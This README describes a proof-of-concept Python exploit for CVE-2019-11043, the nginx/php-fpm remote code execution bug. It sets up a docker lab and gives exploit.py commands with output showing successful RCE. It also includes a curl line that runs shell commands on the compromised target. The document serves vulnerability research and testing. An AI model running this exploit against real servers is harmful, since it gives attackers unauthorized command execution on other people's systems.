PoC CVE-2019-11043

A Python version of the CVE-2019-11043 exploit: https://github.com/neex/phuip-fpizdam
This PoC is still a draft; please use the exploit written by @neex.
Vulnerability analysis: https://paper.seebug.org/1064/

PoC Setup

Run docker-compose to bring up nginx and php-fpm:

# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

To follow the php-fpm logs, run:

docker logs --tail 10 --follow php

Exploit

# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

To check for the vulnerability only, without running the exploit:

python3 exploit.py --url http://localhost/index.php --skip-rce
#...
python3 exploit.py --url http://localhost/index.php --reset

To kill the php-fpm process and reset all injected PHP settings, use --reset:

python3 exploit.py --url http://localhost/index.php --reset

Video PoC

https://twitter.com/Menin_TheMiddle/status/1188776386569355265
